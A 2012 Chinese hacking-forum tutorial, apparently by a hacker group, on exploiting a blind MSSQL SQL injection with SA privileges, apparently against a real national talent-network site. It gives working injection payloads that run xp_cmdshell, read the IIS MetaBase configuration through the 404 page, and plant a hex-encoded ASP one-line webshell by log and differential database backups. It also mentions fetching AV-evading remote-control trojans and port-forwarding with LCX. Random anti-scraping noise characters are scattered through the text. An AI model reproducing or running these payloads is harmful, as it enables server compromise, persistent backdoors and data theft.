找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2573|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————" v  ^5 m6 b. l
5 e: k6 i, ]- G: G$ _
/ B. o, @8 \' S8 w4 f' I/ l
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
2 p! a& e! V( Y* {4 |) J
: o8 X4 o: r7 ?: o4 m! s                                                                 
3 x0 q  e+ r  P8 }' I, ]4 f; c/ L                                                                 
5 q1 [7 c1 c3 N                                                                  论坛: http://www.90team.net/( }+ e; d4 U; C/ k% s+ Y
8 \2 G' u8 F6 K. c+ B% r! c# l
, P2 V* ^" O. K; g' c1 O
$ E) ?  y. Y( e( }) p  _# I
友情检测国家人才网0 }4 T) z/ L7 h' i" |) ]$ V; U( A

4 v3 z* n: }  B' M, k8 h' V0 m6 }* a2 }" A+ h0 X. l& d/ G& z$ V+ g
内容:MSSQL注入SA权限不显错模式下的入侵
4 H) O* Q( `+ O! |% q+ A  |# ~" N3 ^7 B" i" b
" m# P$ r' c* ]7 Y& s! k8 @
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
! |' \) l5 L/ T, O
; F6 t- a) ], C" v) W我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。7 c/ V0 ?* f) {- R2 S

  }9 z. S' {/ I
0 x( |, u" B: T  o3 v# Z9 N这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ z& n6 P" M  S
" T# z% K8 B* G& I: E8 Q: c" t思路:
* a+ E; m0 L9 O% Y( @! C4 Z6 B: n0 L* k1 u1 A% n2 ^; D
首先:% t" ^% T+ @" m( A
  O: h# R" N5 d, a  |, l) p
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
2 b6 Y! R3 e) ]5 ?  y1 y" m* j- l7 @% M  V+ Y
1.日志备份获得Webshell. |# |) s+ _3 Q6 J$ h
% }2 L4 N/ Y- U2 t* t1 q& G
2.数据库差异备份获得Webshell$ e4 ~0 i3 t3 `$ v+ o+ G

; v7 N- ?, |6 L" _# Z+ y4.直接下载免杀远控木马。! P4 U4 M5 ?' j, E
' f! K# |* g  I" _+ @
5.直接下载LCX将服务器端口转发出来
# j, p7 }; N* l, R4 F
0 e( [% f" Z$ ^0 u# {6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
, m' m% W* y: b+ q- B0 b
+ X! o. r7 J7 J# [6 i0 G2 T1 C7 L* t
% j  R, j+ D! ~/ {# h# V# w; i$ u& C- _* h& S
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, * L! f" u+ D& l* U8 B) j

2 k* O5 l0 x( q- p% D, K, Z8 I. X我直接演示后面一个方法
" M& y- e/ c3 ^- D
6 ?. o4 v8 f, i8 q- P1 o6 X
/ M; w8 H& q+ X! A+ e+ M1 K分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 9 G; x+ J- |6 n" v- d" P+ V

8 K9 s6 _3 m$ w- d
7 |; m+ V# l# y2 z6 z- q8 {5 s) z* G
, c7 h% H0 E/ i, x- s2 T$ q
◆日志备份:+ S) b0 \* @% V+ z$ N

- |5 T$ h3 F$ C( l; L. z- ^, }4 S+ q6 x% O) v2 t
1. 进行初始备份. `  x* ~3 v4 M# [6 g3 f9 h; J
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
9 [2 C2 x4 @- V5 Q2 R7 T. H4 q% r6 b) H- u, v6 R" ]: e
2. 插入数据
  I0 Z2 g1 k. v% d5 t( [, Q6 b;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--/ `0 `# }( D. w

: y- ~* `5 v4 Y/ L! I8 j0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>0 ?' H* d( Y- i' o4 n( M6 n. h
  
# {+ y1 D2 E% H) Q( S3. 备份并获得文件,删除临时表
1 Q  D+ ]8 g6 `; i;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--1 |$ }+ k6 N: a7 Y5 r

4 [0 X+ I: l( [$ {) W7 {9 B8 x& z. N
& P3 @& Q: e, w  X
◆数据库差异备份
4 [0 R/ C# j! ]; _# h* [
- W3 L* o& u$ X  E6 r(1. 进行差异备份准备工作
" g) x/ {) ^+ l; j% ?' j: t6 o4 g
. }, C0 X6 P9 I5 N: }+ B;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--. c/ Q  @3 A+ S- R. i
& p+ [7 q* ?+ P( s2 `4 g' f. h' D0 v8 n
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码! `( D  A# B' ^+ Z
1 v" z, B" U8 H( p2 ]7 T6 o

3 _, f& }$ ~' e(2. 将数据写入到数据库
+ j" B, T1 I/ f# ?( };Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  i: T8 Z6 h' L
& G6 G3 x( [1 `- v* P; d0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 v  W9 g/ ?" H  X2 p/ u! a0 Q2 J6 m8 `. N/ M2 [
3. 备份数据库并清理临时文件/ [4 T, H, A; \4 r' P

& K3 R; y" [6 p4 u;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
) B: W1 C  N4 r$ P  \+ U; }9 s
  e7 K4 h( O8 K: E0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
7 B" t$ |' Q! R+ N' u& Q
% \* x8 X8 Z7 c& o3 v
/ p: Q% @& w  S. N+ d- R* p% F/ s# L5 U  z; ]  {6 r1 e
用^转义字符来写ASP(一句话木马)文件的方法:   
; ^1 J5 y" e% c2 A+ Z' L- G/ m9 Y: J- R+ `
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--9 ]# L' O! R+ v) _  r% P) _
8 i1 x  M0 c3 I. V% O+ ^( D
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
" u' N; C8 Y) N8 h6 ]# |3 [6 q5 g& x
1 F# }+ h* m# F4 i读取IIS配置信息获取web路径, g% h  ]$ Y% y0 E$ u  N9 |- }0 {

- u! D- b0 m2 t& ~0 Y6 z& `     # w9 r( Q3 c( w' z3 u
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% R3 _8 n5 J3 h
% ^3 x) P, c( ?5 h) I6 X& J
执行命令
9 |4 p# z) [, K, P/ z3 U. o     
$ w0 ?" C9 t8 q     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--5 o, Q4 i! O) a- m8 p% h

) F/ [* L0 R: L& a
6 u% e- S+ {5 }$ F6 w3 A$ V( x
! h' }) [# U' C' p
! e7 I& J1 m5 Q2 i) O" J7 E2 _- |
* R. a* B  h: @3 T/ r7 z0 V+ X
- \; b; n" y6 W( s4 ~' B4 j# S2 z

) M( b4 c0 W1 a, u+ C
( I0 y  u  @6 H) z1 \( j( J' @
; N% w+ j% H6 j: ?9 |" V4 ~2 y( @& t5 B6 A8 q
! N- i1 `5 Z& a. B. b* l) |9 y$ F
4 t9 k  f4 W; u5 ^2 ?7 R) |) S# g
* q% {: C- `' }4 {, T' e! |

. u' ]0 Q, i, t! }, G0 G1 W& G
$ o" ~/ ]. [( z/ i- a
' M& |+ ^7 H1 ?/ P
2 T( ]; l( o( z* V3 H- T8 z6 @0 f7 b& H; F- W
  i, e  f% K) }1 w" y. H  L
1 s! ~2 k. q" \. b

9 D6 j/ I5 T' y, ~
' Z& O, I8 A) i, S8 r8 b! z9 S3 s0 O2 e$ @7 z
' F. ]+ }# d& |; C/ g& z# q7 \
& i% U8 V* ^% i% V- E
( l. Y) w; f5 r0 r8 O/ f
7 S4 R. A- w% j  k0 }

# L% Z; t- N/ G& }# O  w; K
5 b5 s7 y% z! ]: q2 S: P
$ l9 w; M5 }5 J! @
( `9 V- B; U7 v9 }7 w1 {2 k4 D$ y& N% a: Y
- ^1 f) x1 R3 y
+ R$ c+ q: ~8 x! Q' X  a
; Y. f8 i) L6 ]" Z+ P3 u& w% F' P

- a, p, v5 @5 @- O
( H* q1 z5 W. ~6 y; t# R& `/ a! J! E" V- D1 x5 L, o* H
) _1 s4 s/ u! @% c9 Z( Z5 }

$ m# _  S+ B; V8 Y) T1 P5 ?6 m( B; E# T+ m/ V: Y

. J+ f5 K! ~4 o5 D; W  a* Y8 ^: Y' }' O( b

3 V9 b* l6 B4 N; C0 x# d, I0 ^/ U4 d2 g

! ^. [. v6 N- C3 u4 j1 C; E
8 F2 H! P/ M$ I' H: f. K7 Q9 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表